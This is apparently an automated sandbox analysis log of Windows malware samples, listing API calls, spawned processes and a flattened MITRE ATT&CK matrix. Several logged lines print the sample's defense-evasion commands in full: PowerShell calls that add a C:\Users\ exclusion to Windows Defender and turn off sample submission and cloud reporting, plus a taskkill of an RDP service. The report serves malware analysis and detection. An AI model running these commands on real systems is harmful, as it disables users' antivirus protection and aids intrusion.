Source: C:\Users\user\AppData\Local\Temp\vc71izwl68ub3txurufnpr09g6ni3.exeCode function: 6_2_00007FF77573B6B8 QueryFullProcessImageNameW,SetFileAttributesA,SetUnhandledExceptionFilter,TlsGetValue,VirtualProtect,6_2_00007FF77573B6B8
Source: C:\Users\user\AppData\Local\Temp\vc71izwl68ub3txurufnpr09g6ni3.exeCode function: 6_2_00007FF77573B668 IsDBCSLeadByteEx,OpenProcess,QueryFullProcessImageNameW,SetFileAttributesA,SetUnhandledExceptionFilter,TlsGetValue,VirtualProtect,WideCharToMultiByte,6_2_00007FF77573B668
Source: C:\Users\user\AppData\Local\Temp\vc71izwl68ub3txurufnpr09g6ni3.exeCode function: 6_2_00007FF7757305D9 SetUnhandledExceptionFilter,6_2_00007FF7757305D9
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF6BE031131 Sleep,Sleep,_amsg_exit,_initterm,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,_cexit,22_2_00007FF6BE031131

HIPS / PFW / Operating System Protection Evasion

barindex
Adds a directory exclusion to Windows Defender
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'"Jump to behavior
Modifies Windows Defender protection settings
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -MAPSReporting 0"
Source: C:\Users\user\Desktop\cZO.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -MAPSReporting 0"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vc71izwl68ub3txurufnpr09g6ni3.exeCode function: 6_2_00007FF77572292E strlen,strcat,strlen,strlen,strlen,strcat,strlen,strlen,strlen,strcat,LogonUserA,GetLastError,CreateProcessAsUserA,GetLastError,CloseHandle,CreateProcessA,GetLastError,6_2_00007FF77572292E
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -MAPSReporting 0"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'"Jump to behavior
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 432 -p 6524 -ip 6524
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6524 -s 1236
Source: C:\Users\user\AppData\Local\Temp\shdpeqdz2a54sj46ur0.exeProcess created: C:\Windows\System32\taskkill.exe taskkill.exe /F /FI "SERVICES eq RDP-Controller"Jump to behavior
Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\shdpeqdz2a54sj46ur0.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\vc71izwl68ub3txurufnpr09g6ni3.exeCode function: 6_2_00007FF775726FD5 GetSystemTimeAsFileTime,6_2_00007FF775726FD5
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF8B91538C3 LocalAlloc,wcsncpy,LookupAccountNameW,GetLastError,GetLastError,LocalAlloc,LookupAccountNameW,LocalFree,GetLastError,ConvertSidToStringSidA,GetLastError,wcslen,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,NetApiBufferFree,NetUserEnum,GetProcessHeap,HeapAlloc,memcpy,GetProcessHeap,HeapFree,22_2_00007FF8B91538C3
Source: C:\Users\user\AppData\Local\Temp\shdpeqdz2a54sj46ur0.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: vc71izwl68ub3txurufnpr09g6ni3.exe, 00000006.00000002.2059689197.000001EFE9AD8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: MsMpEng.exe
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF8B91709A8 listen,22_2_00007FF8B91709A8
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF8B915240A socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,22_2_00007FF8B915240A
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF8B915E549 listen,22_2_00007FF8B915E549
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF8B91A3A00 listen,22_2_00007FF8B91A3A00
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF8B91901A9 listen,22_2_00007FF8B91901A9
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF8B9184F8A socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,22_2_00007FF8B9184F8A
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF8BA4F240A socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,22_2_00007FF8BA4F240A
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF8BA4FCC19 listen,22_2_00007FF8BA4FCC19
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF8BA50F900 listen,22_2_00007FF8BA50F900
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF8BFB315FA socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,22_2_00007FF8BFB315FA
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF8BFB4B820 listen,22_2_00007FF8BFB4B820
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF8BFB5254A socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,22_2_00007FF8BFB5254A
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF8BFB6E900 listen,22_2_00007FF8BFB6E900
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF8BFB8E2B9 listen,22_2_00007FF8BFB8E2B9
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF8BFB81ADA socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,22_2_00007FF8BFB81ADA
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF8BFBA0920 listen,22_2_00007FF8BFBA0920
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 32_2_00007FF8B915240A socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,32_2_00007FF8B915240A
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 32_2_00007FF8B9184F8A socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,32_2_00007FF8B9184F8A
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 32_2_00007FF8BA50240A socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,32_2_00007FF8BA50240A
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 32_2_00007FF8BFB315FA socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,32_2_00007FF8BFB315FA
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 32_2_00007FF8BFB5254A socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,32_2_00007FF8BFB5254A
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 32_2_00007FF8BFB8E2B9 listen,32_2_00007FF8BFB8E2B9
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 32_2_00007FF8BFB81ADA socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,32_2_00007FF8BFB81ADA
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 32_2_00007FF8BFBA0920 listen,32_2_00007FF8BFBA0920

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting		2
Valid Accounts		21
Windows Management Instrumentation		1
Scripting		1
DLL Side-Loading		21
Disable or Modify Tools		1
Network Sniffing		1
System Time Discovery		Remote Services1
Archive Collected Data		4
Ingress Tool Transfer		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts3
Native API		1
DLL Side-Loading		2
Valid Accounts		1
Deobfuscate/Decode Files or Information		LSASS Memory1
Account Discovery		Remote Desktop ProtocolData from Removable Media11
Encrypted Channel		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts2
Command and Scripting Interpreter		1
Create Account		2
Access Token Manipulation		3
Obfuscated Files or Information		Security Account Manager1
System Service Discovery		SMB/Windows Admin SharesData from Network Shared Drive1
Non-Standard Port		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal Accounts3
Service Execution		2
Valid Accounts		4
Windows Service		1
Software Packing		NTDS3
File and Directory Discovery		Distributed Component Object ModelInput Capture1
Multi-hop Proxy		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchd4
Windows Service		11
Process Injection		1
Timestomp		LSA Secrets1
Network Sniffing		SSHKeylogging3
Non-Application Layer Protocol		Scheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled Task1
Services File Permissions Weakness		1
Services File Permissions Weakness		1
DLL Side-Loading		Cached Domain Credentials44
System Information Discovery		VNCGUI Input Capture4
Application Layer Protocol		Data Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
File Deletion		DCSync1
Network Share Discovery		Windows Remote ManagementWeb Portal Capture2
Proxy		Exfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
Masquerading		Proc Filesystem141
Security Software Discovery		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt2
Valid Accounts		/etc/passwd and /etc/shadow41
Virtualization/Sandbox Evasion		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron2
Access Token Manipulation		Network Sniffing2
Process Discovery		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd41
Virtualization/Sandbox Evasion		Input Capture1
Application Window Discovery		Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task11
Process Injection		Keylogging1
System Owner/User Discovery		Taint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
